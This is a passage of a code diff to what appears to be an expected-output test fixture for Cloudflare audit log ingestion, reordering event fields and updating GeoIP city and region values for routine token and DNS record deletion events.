"{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1d6bb655-9645-495b-bebe-f4537c2f7eaa\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:01Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "1d6bb655-9645-495b-bebe-f4537c2f7eaa", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -999,14 +999,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1018,6 +1018,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084197Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_roll\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fc845f5-9180-44c2-b67d-154bce5b220e\",\"interface\":\"\",\"metadata\":{\"new_token_hash\":\"3feb599ff44fa121eeb4989ffdf725cbdfae12ffb73e65131e42290da0dfb45b\",\"old_token_hash\":\"a2c8f6ae8f72f9e46c1448a0d8be12e0946c85c408ce6a55c81f41b78df584c6\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:36:30Z\"}", + "kind": "event", + "action": "token_roll", + "id": "2fc845f5-9180-44c2-b67d-154bce5b220e", + "type": [ + "change" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1038,20 +1052,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776142374Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_roll\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fc845f5-9180-44c2-b67d-154bce5b220e\",\"interface\":\"\",\"metadata\":{\"new_token_hash\":\"3feb599ff44fa121eeb4989ffdf725cbdfae12ffb73e65131e42290da0dfb45b\",\"old_token_hash\":\"a2c8f6ae8f72f9e46c1448a0d8be12e0946c85c408ce6a55c81f41b78df584c6\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:36:30Z\"}", - "kind": "event", - "action": "token_roll", - "id": "2fc845f5-9180-44c2-b67d-154bce5b220e", - "type": [ - "change" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1079,14 +1079,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1098,6 +1098,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084580Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"fc13c1d1-22ff-4574-a01f-7a3506b93d3a\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:33:55Z\"}", + "kind": "event", + "action": "token_create", + "id": "fc13c1d1-22ff-4574-a01f-7a3506b93d3a", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1116,20 +1130,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776145036Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"fc13c1d1-22ff-4574-a01f-7a3506b93d3a\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:33:55Z\"}", - "kind": "event", - "action": "token_create", - "id": "fc13c1d1-22ff-4574-a01f-7a3506b93d3a", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1157,14 +1157,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1176,6 +1176,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084950Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"46256ba8-2188-432c-8f55-21cfd2caf7d6\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:20:00.289876Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "46256ba8-2188-432c-8f55-21cfd2caf7d6", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1203,21 +1218,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776147667Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"46256ba8-2188-432c-8f55-21cfd2caf7d6\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:20:00.289876Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "46256ba8-2188-432c-8f55-21cfd2caf7d6", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1245,14 +1245,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1264,6 +1264,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389085443Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"67a29a10-e567-4123-8453-65ddcc95a411\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:58.237877Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "67a29a10-e567-4123-8453-65ddcc95a411", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1291,21 +1306,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776150386Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"67a29a10-e567-4123-8453-65ddcc95a411\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:58.237877Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "67a29a10-e567-4123-8453-65ddcc95a411", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1333,14 +1333,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1352,6 +1352,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389085827Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c61e6039-6c53-42e8-8f30-24812d5d83dc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"xClZppVPmuzSwaAIv-asdfasdfasdfa\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:55.959347Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "c61e6039-6c53-42e8-8f30-24812d5d83dc", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1379,21 +1394,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776152963Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c61e6039-6c53-42e8-8f30-24812d5d83dc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"xClZppVPmuzSwaAIv-asdfasdfasdfa\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:55.959347Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "c61e6039-6c53-42e8-8f30-24812d5d83dc", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1421,14 +1421,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1440,6 +1440,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389086191Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"db70fb89-0070-4591-8dbd-1b4277a056fc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:53.671977Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "db70fb89-0070-4591-8dbd-1b4277a056fc", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1468,21 +1483,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776155575Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"db70fb89-0070-4591-8dbd-1b4277a056fc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:53.671977Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "db70fb89-0070-4591-8dbd-1b4277a056fc", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1510,14 +1510,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1529,6 +1529,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389086569Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"d135d737-3a93-4a99-8ba3-8eaf8a149daf\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:51.321861Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "d135d737-3a93-4a99-8ba3-8eaf8a149daf", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1557,21 +1572,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776158237Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"d135d737-3a93-4a99-8ba3-8eaf8a149daf\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:51.321861Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "d135d737-3a93-4a99-8ba3-8eaf8a149daf", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1599,14 +1599,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1618,14 +1618,29 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "cloudflare": { - "audit": { - "actor": { - "type": "user" - }, - "owner": { - "id": "eojhfbg334i88zs2pr2rd7wr82jf2h95" - }, + "event": { + "ingested": "2021-12-14T14:41:11.389086939Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c6eca550-2e5b-43da-8125-4857d928899e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:48.87573Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "c6eca550-2e5b-43da-8125-4857d928899e", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, + "cloudflare": { + "audit": { + "actor": { + "type": "user" + }, + "owner": { + "id": "eojhfbg334i88zs2pr2rd7wr82jf2h95" + }, "metadata": { "zone_name": "example.com" }, @@ -1646,21 +1661,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776160838Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c6eca550-2e5b-43da-8125-4857d928899e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:48.87573Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "c6eca550-2e5b-43da-8125-4857d928899e", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1688,14 +1688,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1707,6 +1707,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389087309Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"df20e4be-09f1-44b2-b1ee-3d44b7eca81e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:46.609249Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "df20e4be-09f1-44b2-b1ee-3d44b7eca81e", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1735,21 +1750,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776163448Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"df20e4be-09f1-44b2-b1ee-3d44b7eca81e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:46.609249Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "df20e4be-09f1-44b2-b1ee-3d44b7eca81e", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1777,14 +1777,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1796,6 +1796,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389087679Z", + "original": 